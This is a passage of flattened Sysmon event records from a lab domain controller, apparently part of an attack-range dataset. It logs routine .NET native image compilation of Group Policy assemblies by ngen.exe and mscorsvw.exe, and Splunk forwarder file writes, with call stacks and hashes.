21:03:35.690{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-3D03-00000000CF01}2072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020139Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:35.675{4DB9351A-A1A7-60D3-3C03-00000000CF01}6928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b10-0\Microsoft.GroupPolicy.ServerAdminTools.Private.GpmgmtpLib.dll2021-06-23 21:03:35.675 23542300x800000000000000020138Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.675{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8911EF9603C302D55E909D07F9082CAC,SHA256=AAC72F2DE5CC7A8097D945554D5A5F05D63F1AA36E1BDBA8CC4B62B9EDA35EB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020137Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.628{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A7-60D3-3C03-00000000CF01}6928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020136Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.612{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A7-60D3-3C03-00000000CF01}6928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020135Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.612{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-3C03-00000000CF01}6928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020134Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.581{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A7-60D3-3B03-00000000CF01}4832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020133Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.581{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A7-60D3-3B03-00000000CF01}4832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020132Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.565{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-3B03-00000000CF01}4832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020131Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.565{4DB9351A-A1A7-60D3-3A03-00000000CF01}6936NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b18-0\Microsoft.GroupPolicy.Commands.dllMD5=F999FA3CE2FFE86E86886C6826A276DD,SHA256=3E89D13E6F0B6AA16CE301B010FFE629D51DD7B0FBECC0DE1A071CD3082EC72E,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000020130Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:35.550{4DB9351A-A1A7-60D3-3A03-00000000CF01}6936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b18-0\Microsoft.GroupPolicy.Commands.dll2021-06-23 21:03:35.550 10341000x800000000000000020129Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.409{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A7-60D3-3A03-00000000CF01}6936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020128Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.393{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A7-60D3-3A03-00000000CF01}6936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020127Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.393{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-3A03-00000000CF01}6936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020126Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.393{4DB9351A-A1A7-60D3-3903-00000000CF01}6996NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b54-0\Microsoft.GroupPolicy.Commands.dllMD5=F999FA3CE2FFE86E86886C6826A276DD,SHA256=3E89D13E6F0B6AA16CE301B010FFE629D51DD7B0FBECC0DE1A071CD3082EC72E,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000020125Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:35.378{4DB9351A-A1A7-60D3-3903-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b54-0\Microsoft.GroupPolicy.Commands.dll2021-06-23 21:03:35.378 10341000x800000000000000020124Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.237{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A7-60D3-3903-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020123Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.222{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1A7-60D3-3903-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020122Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.222{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-3903-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020121Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.175{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A7-60D3-3803-00000000CF01}6908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020120Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.159{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A7-60D3-3803-00000000CF01}6908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020119Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.159{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-3803-00000000CF01}6908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020118Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.143{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A1E7D8C4494A6F0F58F12E0E4551CE5,SHA256=5CAE42C95B80DB99E428404FAAFE2F9C1368C135DF393E106525E3546401C9E4,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000020117Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:35.143{4DB9351A-A1A7-60D3-3703-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f60-0\Microsoft.GroupPolicy.ServerAdminTools.GpmgmtLib.dll2021-06-23 21:03:35.143 10341000x800000000000000020116Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.050{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A7-60D3-3703-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020115Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.034{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A7-60D3-3703-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020114Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.034{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-3703-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020113Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 